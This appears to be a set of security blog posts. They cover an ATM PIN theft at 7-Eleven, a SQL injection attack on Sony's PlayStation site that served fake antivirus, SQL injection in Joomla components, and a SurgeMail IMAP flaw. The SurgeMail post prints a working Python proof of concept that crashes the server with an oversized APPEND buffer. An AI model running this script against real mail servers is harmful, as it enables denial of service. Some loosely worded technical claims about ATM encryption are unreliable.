Hackers gained access to PIN codes from ATM machines in 7-eleven stores. They stole identities, PIN numbers and a lot of cash, A closely guarded ATM security tool as revealed a large hole in the ATM network not to mention, many of the ATM networks around the United States are built on the Windows operating system, making them even more vulnerable. PIN numbers have very week encrpytion, leaking partial keys similar to wi-fi leaks.

Citibank has about 5,700 Citibank-branded ATM machines installed in 7-Eleven stores throughout the U.S., but Citibank does not own any of the ATMs.

The ATM was hacked through a third party server at a data processing center

And the SQL Injection pwns another website. Sony’s PS3 website was hacked via an SQL Injection exploit, imagine that. The hackers created a pop-up message saying that your computer is infected and then linked you to a page where you could purchase some software to clean it up. Most likely the software you purchase from these hackers would only make your computer into a zombie. Zombie’s are hidden process’s that are awaken when a master gives them commands. They do various tasks including massive Distributed Denial of Service attacks and other brute force hacking tasks. Lets not forget malware, fake anti-virus software can also scan your hard drive for personal information.

“There are millions of video game lovers around the world, many of whom will visit Sony’s PlayStation website regularly to find out more about the latest console games,” said Graham Cluley, senior technology consultant at Sophos. Read the rest of this entry »

The IMAP service in surgemail contains a remote buffer overflow problem in the APPEND command. The server can be remotely shutdown by issues a sequence of commands. Keep in mind that this is post authorized meaning that you’ll need an account to actually exploit this bug.

Code as follows:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = ‘\x41′ * 3000

s.connect((’192.168.0.103′,143))
s.recv(1024)
s.send(’A001 LOGIN user@test.com user ‘ + buffer + ‘\r\n’)
s.recv(1024)
s.send(’A001 APPEND ‘ + buffer + ‘\r\n’)
s.recv(1024)
s.close()

Recently I’ve been noticing a number of Joomla components with SQL injection issues. These components are not part of the based platform of Joomla, but they can put your system at risk if you don’t know about the issues. Joomla developers need to build theirs own data management protocol for their software so that component developers aren’t running pure SQL statements. This could greatly cut down on the SQL injection issue Joomla is facing.

SQL Injection allows a hacker to run SQL statements by modifying POST or GET query’s, allowing the changing or removal of data from databases. Read the rest of this entry »